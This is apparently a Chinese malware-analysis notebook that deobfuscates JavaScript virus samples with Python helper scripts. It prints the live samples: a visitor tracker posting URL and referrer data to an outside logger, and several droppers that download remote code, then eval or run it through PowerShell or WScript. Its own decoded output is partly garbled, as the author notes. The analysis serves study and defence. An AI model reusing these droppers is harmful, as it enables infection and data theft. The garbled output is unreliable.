Virus_JS3_PyAnalysisAndSummary

本篇是对JS样本所做简单分析的第三篇,内容与前两篇有些重复,权当巩固.

0x1 Sample(TotalSamp_myself\Js–166x–63)

var _0x586f=["\x76\x61\x6C\x75\x65","\x78\x4B\x65\x79\x78","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x55\x52\x4C","\x26","\x26\x61\x6D\x70\x3B","\x72\x65\x70\x6C\x61\x63\x65","\x6B","\x72\x65\x66\x65\x72\x72\x65\x72","\x64\x6F\x63\x75\x6D\x65\x6E\x74","\x65\x72\x72","\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6F\x67\x67\x65\x72\x2E\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x4C\x6F\x67\x67\x65\x72\x2E\x61\x73\x6D\x78","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x74\x65\x78\x74\x2F\x78\x6D\x6C","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D\x38\x22\x20\x3F\x3E","\x3C\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x69\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x2D\x69\x6E\x73\x74\x61\x6E\x63\x65\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x73\x64\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x32\x30\x30\x31\x2F\x58\x4D\x4C\x53\x63\x68\x65\x6D\x61\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x6F\x61\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x73\x63\x68\x65\x6D\x61\x73\x2E\x78\x6D\x6C\x73\x6F\x61\x70\x2E\x6F\x72\x67\x2F\x73\x6F\x61\x70\x2F\x65\x6E\x76\x65\x6C\x6F\x70\x65\x2F\x22\x3E","\x3C\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x4C\x6F\x67\x44\x61\x74\x61\x20\x78\x6D\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x79\x73\x61\x62\x65\x6C\x2E\x65\x75\x2F\x22\x3E","\x3C\x6B\x3E","\x3C\x2F\x6B\x3E","\x3C\x75\x72\x6C\x3E","\x64\x6F\x6D\x61\x69\x6E","\x3C\x2F\x75\x72\x6C\x3E","\x3C\x65\x76\x3E","\x3C\x2F\x65\x76\x3E","\x3C\x2F\x4C\x6F\x67\x44\x61\x74\x61\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x42\x6F\x64\x79\x3E","\x3C\x2F\x73\x6F\x61\x70\x3A\x45\x6E\x76\x65\x6C\x6F\x70\x65\x3E","\x73\x65\x6E\x64","","\x22\x2C","\x22
","\x44\x4F\x4D\x50\x61\x72\x73\x65\x72","\x70\x61\x72\x73\x65\x46\x72\x6F\x6D\x53\x74\x72\x69\x6E\x67","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x44\x4F\x4D","\x61\x73\x79\x6E\x63","\x6C\x6F\x61\x64\x58\x4D\x4C","\x6E\x6F\x64\x65\x56\x61\x6C\x75\x65","\x63\x68\x69\x6C\x64\x4E\x6F\x64\x65\x73","\x4C\x6F\x67\x44\x61\x74\x61\x52\x65\x73\x75\x6C\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50","\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x20\x6E\x6F\x74\x20\x73\x75\x70\x70\x6F\x72\x74\x65\x64"];
var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];var visitorData= new visitorData(k);function visitorData(_0xf4c7x3){this[_0x586f[3]]=document[_0x586f[3]][_0x586f[6]](_0x586f[4],_0x586f[5]);this[_0x586f[7]]=_0xf4c7x3;try{this[_0x586f[8]]=top[_0x586f[9]][_0x586f[8]][_0x586f[6]](_0x586f[4],_0x586f[5]);} catch(err){this[_0x586f[8]]=_0x586f[10];} ;var _0xf4c7x4=CreateXMLHttpRequest();_0xf4c7x4[_0x586f[13]](_0x586f[11],_0x586f[12],true);_0xf4c7x4[_0x586f[16]](_0x586f[14],_0x586f[15]);var _0xf4c7x5=_0x586f[17]+_0x586f[18]+_0x586f[19]+_0x586f[20]+_0x586f[21]+_0xf4c7x3+_0x586f[22]+_0x586f[23]+document[_0x586f[24]]+_0x586f[25]+_0x586f[26]+objToString(this)+_0x586f[27]+_0x586f[28]+_0x586f[29]+_0x586f[30];_0xf4c7x4[_0x586f[31]](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8=_0x586f[32];try{_0xf4c7x8+=_0xf4c7x7[_0x586f[3]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[7]].toString()+_0x586f[33];_0xf4c7x8+=_0x586f[34]+_0xf4c7x7[_0x586f[8]].toString()+_0x586f[33];} catch(err){_0xf4c7x8=_0xf4c7x7[_0x586f[3]].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window[_0x586f[35]]){parser= new DOMParser();xmlDoc=parser[_0x586f[36]](_0xf4c7xa,_0x586f[15]);} else {xmlDoc= new ActiveXObject(_0x586f[37]);xmlDoc[_0x586f[38]]=false;xmlDoc[_0x586f[39]](_0xf4c7xa);} ;return xmlDoc[_0x586f[43]](_0x586f[42])[0][_0x586f[41]][0][_0x586f[40]];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!=_0x586f[44]){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!=_0x586f[44]){return  new ActiveXObject(_0x586f[45]);} else {throw  new Error(_0x586f[46]);} ;} ;} ;

0x2 py脚本

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

'ahoo - helper script for decoding an obfuscated JS sample'

# Author tag picked up by tooling; the banner written by WriteResultFile repeats it.
__author__ = 'ahoo'

import sys
import io
import os
import codecs
import re
import shutil

PutPath = '063.JS.vir'          # input: the obfuscated JS sample to decode
OutPath = '63_analysis.txt'     # output: the decoded text produced by JSVirus_Parse

# Unused at module level: JSVirus_Parse assigns a local of the same name.
myJslog = []

# True until WriteResultFile has written its banner once; it then sets this False.
AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') # force UTF-8 on stdout regardless of the console's default encoding


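def ReadLogFile(InPath, ReadTye='r'):
    """Read a UTF-8 text file into a list of lines (line endings are kept).

    Args:
        InPath: path of the file to read.
        ReadTye: mode passed to ``codecs.open``; ``'r'`` by default.

    Returns:
        The file's lines as a list of ``str``; an empty list when ``InPath``
        does not exist.

    Raises:
        UnicodeDecodeError: if the file is not valid UTF-8 (a raw sample may
        not be, so callers may want to catch this).
    """
    logall = []
    if not os.path.exists(InPath):
        return logall
    # ``with`` releases the handle even if decoding fails part-way through;
    # the original explicit close() was skipped on any exception.
    with codecs.open(InPath, ReadTye, 'utf-8') as f:
        logall.extend(f)
    return logall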



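def WriteResultFile(OutRePath, findRe=(), WriteTye='a+'):
    """Append the collected lines to the result file.

    Args:
        OutRePath: path of the output file (created if missing, appended otherwise).
        findRe: iterable of strings; each one is written followed by ``'\\n'``.
        WriteTye: mode passed to ``codecs.open``; ``'a+'`` by default.

    Returns:
        True; any I/O error propagates to the caller.

    Side effects:
        The first call in the process writes a banner and sets the module-level
        ``AuthorSign`` flag to False so later calls skip it.
    """
    global AuthorSign
    # ``with`` closes the file even if a write fails part-way through.
    with codecs.open(OutRePath, WriteTye, 'utf-8') as f:
        if AuthorSign:
            f.write('\n*****************************************************\r\n')
            f.write('*              ahoo JsVirusAnalysis                        ')
            f.write('\n***************************************************\r\n\n')
            AuthorSign = False
        for i in findRe:
            f.write(i + '\n')
    return True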


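def _decode_hex_escapes(text):
    """Turn every JS ``\\xHH`` escape in *text* into the character it encodes.

    Matches both hex digits of the escape (the old pattern only accepted a
    leading ``0-9``, so ``\\xA3``-style escapes were left undecoded). A
    replacement *function* is used instead of a replacement string so that a
    decoded backslash (``\\x5C``) is inserted literally rather than being
    re-interpreted by ``re.sub`` as an escape sequence.
    """
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), text)


def _split_string_array(array_body):
    """Split the inside of a JS ``["...","..."]`` literal into decoded, quoted entries.

    The entries are tokenised as real string literals instead of ``split(',')``:
    an entry that itself contains ``\\x2C`` (',') or ``\\x22`` ('"') would
    otherwise shift every later index, and the rewritten code would then map
    to the wrong strings. Each returned entry keeps its surrounding quotes so
    it can be dropped straight into ``name[N]`` references.
    """
    literals = re.findall(r'"((?:\\.|[^"\\])*)"', array_body)
    return ['"' + _decode_hex_escapes(s) + '"' for s in literals]


def JSVirus_Parse(array_name='_0x586f'):
    """Rewrite the obfuscated sample in ``PutPath`` into readable JS in ``OutPath``.

    Steps: (1) read the sample line by line; (2) find the string-array
    declaration ``<array_name>=[...]``, decode its ``\\xHH`` escapes and build an
    index -> string table; (3) replace every ``<array_name>[N]`` reference in
    the remaining lines with the quoted string at index N and remove the
    ``"+"`` glue between adjacent literals; (4) write the result to ``OutPath``
    and open it in Notepad.

    Args:
        array_name: name of the obfuscation string array; ``'_0x586f'`` by
            default (the sample analysed in this post).

    Returns:
        True.

    Raises:
        Whatever ``ReadLogFile`` / ``WriteResultFile`` raise on I/O errors.
    """
    # 1. read the sample into a line list
    myJslog = ReadLogFile(PutPath)

    writeList = []        # lines to emit, the decoded array declaration first
    writeList_temp = []   # every line that is not the array declaration
    f586List = []         # index -> quoted, decoded string

    # 2. locate the array declaration and build the lookup table
    array_decl = re.compile(re.escape(array_name) + r'\s*=\s*\[(.*)\]')
    for line in myJslog:
        decl = array_decl.search(line)
        if decl is None:
            writeList_temp.append(line)
            continue
        # build the table from the raw (still escaped) literals, then emit the
        # fully decoded declaration for the reader
        f586List = _split_string_array(decl.group(1))
        line = _decode_hex_escapes(line)
        print(line)
        writeList.append(line)
        print(f586List)

    # 3. resolve array references; the patterns are the same for every line,
    #    so compile them once instead of inside the loop
    index_ref = re.compile(re.escape(array_name) + r'\s*\[(\d+)\]')
    plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"')

    def _lookup(match):
        # an index the table does not cover is left as-is instead of raising,
        # so a partially parsed array still yields readable output
        idx = int(match.group(1))
        return f586List[idx] if idx < len(f586List) else match.group(0)

    for line in writeList_temp:
        line = index_ref.sub(_lookup, line)
        # drop the "+" glue so adjacent literals read as one string
        line = plus.sub('', line)
        # one entry per processed line (appending after the loop would keep
        # only the last line)
        writeList.append(line)

    # 4. write the result and open it in Notepad
    WriteResultFile(OutPath, writeList)
    # OutPath is a module constant, not user input, so the shell command is
    # safe; use subprocess.run([...]) if the path ever becomes configurable
    os.system('notepad.exe ' + OutPath)

    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True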

if __name__ == '__main__':
    # Entry point: reads PutPath, writes OutPath and opens it in Notepad.
    JSVirus_Parse()

0x3 输出结果

经过美化(格式化)后的输出. 注意:从 "send" 之后的几项起(含 \x2C 逗号、\x22 引号的字符串),脚本按 ',' 切分数组会使后续索引错位,因此下面 parseResponse/CreateXMLHttpRequest 中替换出的字符串是错的(如 window["""]).
var _0x586f=["value","xKeyx","getElementById","URL","&","&amp;","replace","k","referrer","document","err","POST","http://logger.ysabel.eu/Logger.asmx","open","Content-Type","text/xml","setRequestHeader","<?xml version="1.0" encoding="utf-8" ?>","<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">","<soap:Body>","<LogData xmlns="http://ysabel.eu/">","<k>","</k>","<url>","domain","</url>","<ev>","</ev>","</LogData>","</soap:Body>","</soap:Envelope>","send","","",",""","DOMParser","parseFromString","Microsoft.XMLDOM","async","loadXML","nodeValue","childNodes","LogDataResult","getElementsByTagName","undefined","Microsoft.XMLHTTP","XMLHttpRequest not supported"];

var k = document["getElementById"]("xKeyx")["value"];
var visitorData = new visitorData(k);

function visitorData(_0xf4c7x3) {
        this["URL"] = document["URL"]["replace"]("&", "&amp;");
        this["k"] = _0xf4c7x3;
        try {
            this["referrer"] = top["document"]["referrer"]["replace"]("&", "&amp;");
        } catch (err) {
            this["referrer"] = "err";
        };
        var _0xf4c7x4 = CreateXMLHttpRequest();
        _0xf4c7x4["open"]("POST", "http://logger.ysabel.eu/Logger.asmx", true);
        _0xf4c7x4["setRequestHeader"]("Content-Type", "text/xml");
        var _0xf4c7x5 = "<?xml version=" 1.0 " encoding="utf - 8 " ?><soap:Envelope xmlns:xsi="http: //www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/<soap:Body><LogData xmlns="http://ysabel.eu/<k>"+_0xf4c7x3+"</k><url>"+document["domain</url><ev>"+objToString(this)+"</ev></LogData></soap:Body></soap:Envelope>";_0xf4c7x4["send"](_0xf4c7x5);} ;function objToString(_0xf4c7x7){var _0xf4c7x8="";try{_0xf4c7x8+=_0xf4c7x7["URL"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["k"].toString()+"";_0xf4c7x8+="+_0xf4c7x7["referrer"].toString()+"";} catch(err){_0xf4c7x8=_0xf4c7x7["URL"].toString();} ;return _0xf4c7x8;} ;function parseResponse(_0xf4c7xa){if(window["""]){parser= new DOMParser();xmlDoc=parser["DOMParser"](_0xf4c7xa,"text/xml");} else {xmlDoc= new ActiveXObject("parseFromString");xmlDoc["Microsoft.XMLDOM"]=false;xmlDoc["async"](_0xf4c7xa);} ;return xmlDoc["LogDataResult"]("childNodes")[0]["nodeValue"][0]["loadXML"];} ;function CreateXMLHttpRequest(){if( typeof XMLHttpRequest!="getElementsByTagName"){return  new XMLHttpRequest();} else {if( typeof ActiveXObject!="getElementsByTagName"){return  new ActiveXObject("undefined");} else {throw  new Error("Microsoft.XMLHTTP");} ;} ;} ;



0x4 注意

[1]生成代码后做个美容(格式化)
http://www.css88.com/tool/js_beautify/
[2]正则测试工具(F:\RegTestTool.exe)

0x5 下面做点扩充,后续的JS样本都往这里续写…

0x5.1 Num25

var d=new ActiveXObject('Shell.TrimiApplication'.replace('Trimi',''));
d.ShellExecute("PowerShell","(New-Object System.Net.WebClient).DownloadFile('http://pomf.nyafuu.org/files/hekycc.exe','hajdebabuchajde.pif');Start-Process 'hajdebabuchajde.pif'","","",0);

0x5.2 Num41

var m = "rZJ-8RCo-l6L4KpmDDYk-Djc_A3rIzZDBY0MtnHpZMggmgBiXlxzsG70G_17kBhVkZlNn9wUQQ0"; 
var x = new Array("jaysonandfrisby.com","romiecoston.com"); 
var z1 = "Msxml2.XMLHTTP"; 
var z4 = "a"; 
for (var i=0; i<2; i++) {
    var e = new ActiveXObject(z1); 
    try { 
        e.open("GET", "http://"+x[i]+"/counter/?"+m, false);        e.send(); 
        if (e.status == 200) {
            var z3 = e.responseText; 
            var z3 = z3.split(m); 
            var z3 = z3.join(z4); 
            eval(z3); 
            break; }
        ; } 
    catch(e) 
        { };
 };

0x5.3 Num29

0x5.3.1样本
    var random=function(){return Math.random()};
    try{
    var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");
    objHttp.Open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x6C\x2D\x70\x68\x64\x7A\x6D\x66\x6A\x68\x2E\x6E\x6C\x2F\x70\x32\x65\x2E\x6A\x73\x3F"+ random(),false);
    objHttp.Send();if(objHttp.Status== 200){
        eval(objHttp.responseText+ "\x64\x6F\x77\x6E\x41\x6E\x64\x45\x78\x65\x63\x28\x22\x70\x67\x36\x76\x22\x29\x3B")}
    }
    catch(e){}
0x5.3.2Py代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

'ahoo - helper script for decoding the hex escapes of a JS sample'

# Author tag picked up by tooling; the banner written by WriteResultFile repeats it.
__author__ = 'ahoo'

import sys
import io
import os
import codecs
import re
import shutil

PutPath = '029.JS.vir'          # input: the JS sample whose \xHH escapes are decoded
OutPath = '29_analysis.txt' # output: the decoded text produced by JSVirus_Parse

# Unused at module level: JSVirus_Parse assigns a local of the same name.
myJslog = []

# True until WriteResultFile has written its banner once; it then sets this False.
AuthorSign = True
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8') # force UTF-8 on stdout regardless of the console's default encoding


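def ReadLogFile(InPath, ReadTye='r'):
    """Read a UTF-8 text file into a list of lines (line endings are kept).

    Args:
        InPath: path of the file to read.
        ReadTye: mode passed to ``codecs.open``; ``'r'`` by default.

    Returns:
        The file's lines as a list of ``str``; an empty list when ``InPath``
        does not exist.

    Raises:
        UnicodeDecodeError: if the file is not valid UTF-8 (a raw sample may
        not be, so callers may want to catch this).
    """
    logall = []
    if not os.path.exists(InPath):
        return logall
    # ``with`` releases the handle even if decoding fails part-way through;
    # the original explicit close() was skipped on any exception.
    with codecs.open(InPath, ReadTye, 'utf-8') as f:
        logall.extend(f)
    return logall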



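def WriteResultFile(OutRePath, findRe=(), WriteTye='a+'):
    """Append the collected lines to the result file.

    Args:
        OutRePath: path of the output file (created if missing, appended otherwise).
        findRe: iterable of strings; each one is written followed by ``'\\n'``.
        WriteTye: mode passed to ``codecs.open``; ``'a+'`` by default.

    Returns:
        True; any I/O error propagates to the caller.

    Side effects:
        The first call in the process writes a banner and sets the module-level
        ``AuthorSign`` flag to False so later calls skip it.
    """
    global AuthorSign
    # ``with`` closes the file even if a write fails part-way through.
    with codecs.open(OutRePath, WriteTye, 'utf-8') as f:
        if AuthorSign:
            f.write('\n*****************************************************\r\n')
            f.write('*              ahoo JsVirusAnalysis                        ')
            f.write('\n***************************************************\r\n\n')
            AuthorSign = False
        for i in findRe:
            f.write(i + '\n')
    return True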


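def JSVirus_Parse():
    """Decode the ``\\xHH`` escapes of the sample in ``PutPath`` into ``OutPath``.

    Every line of the input is read, each ``\\xHH`` escape is replaced by the
    character it encodes, the decoded line is echoed to stdout and collected,
    and the collection is written to ``OutPath`` which is then opened in
    Notepad.

    Returns:
        True.

    Raises:
        Whatever ``ReadLogFile`` / ``WriteResultFile`` raise on I/O errors.
    """
    # 1. read the sample into a line list
    myJslog = ReadLogFile(PutPath)

    # both hex digits are accepted; the old pattern only matched a leading
    # 0-9 and so left escapes such as \xA3 undecoded
    hex_escape = re.compile(r'\\x([0-9a-fA-F]{2})')

    writeList = []
    for line in myJslog:
        # a replacement function inserts a decoded backslash (\x5C) literally
        # instead of letting re.sub re-interpret it as an escape sequence
        line = hex_escape.sub(lambda m: chr(int(m.group(1), 16)), line)
        print(line)
        writeList.append(line)

    # 2. write the result and open it in Notepad
    WriteResultFile(OutPath, writeList)
    # OutPath is a module constant, not user input, so the shell command is
    # safe; use subprocess.run([...]) if the path ever becomes configurable
    os.system('notepad.exe ' + OutPath)

    print('The Virus has been analyzed,there is my advice! Thanks!')
    return True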

if __name__ == '__main__':
    # Entry point: reads PutPath, writes OutPath and opens it in Notepad.
    JSVirus_Parse()
0x5.3.3输出
*****************************************************
*               ahoo JsVirusAnalysis                        
***************************************************

var random=function(){
    return Math.random()};
try{
    var objHttp=WScript.CreateObject("MSXML2.XMLHTTP");
    objHttp.Open("GET","https://dl-phdzmfjh.nl/p2e.js?"+ random(),false);
    objHttp.Send();if(objHttp.Status== 200){
        eval(objHttp.responseText+ "downAndExec("pg6v");")}
}
catch(e){}

0x6 小结

强调一点:复杂、看不懂的代码先做美化(格式化),这样找规律容易得多
【调试】js/vbs(默认调试器vs2013):cmd:WScript.exe /x name.js/vbs
【调试】JS(od-找downhttp):OD载入wscript.exe,调试->参数(jsPaht),ctrl+F2,bp UrlCanonicalizeA/W,F9.
【调试】正则工具: F:\RegTestTool.exe
【代码美化-VB】(http://tools.jb51.net/code/vbscodeformat)
【代码美化-JS】http://www.css88.com/tool/js_beautify/
【VB关键字】executeglobal(str) EXECUTE(str)
【写入法核心】set fso = CreateObject("Scripting.FileSystemObject"):set f = fso.CreateTextFile("C:\VbsVirLog.txt", true):f.Write(str)
【正则】1.替换"+": plus = re.compile(r'"[\s\S]{0,3}\+[\s\S]{0,3}"') ;line = plus.sub('',line)
        2.替换某一行中的所有符合条件
        ''' for test
        line11 = "var k=document[_0x586f[2]](_0x586f[1])[_0x586f[0]];"
        print(line11)
        pattern_arrary= re.compile('(_0x586f\s*\[\d{1,3}])')
        for arrary  in  re.findall('_0x586f\s*\[(\d{1,3})]',line11):
            index = int(arrary)
            repStr = "*haha*"
            line11 = pattern_arrary.sub(repStr,line11,count=1)
        print(line11)
        '''
        3.替换\0x56为char
        '''
        line = 'var objHttp=WScript.CreateObject("\x4D\x53\x58\x4D\x4C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50");'
        pattern_ascii = re.compile(r'(\\x([0-9][a-zA-Z0-9]))')
        for i in pattern_ascii.findall(line):
            #方法1
            #line = line.replace(i[0], chr(int(i[1],16)))
            #方法2
            pattern_temp = re.compile(r'(\\x[0-9][a-zA-Z0-9])')
            line = pattern_temp.sub(chr(int(i[1],16)),line,count =1)
        print(line)
        '''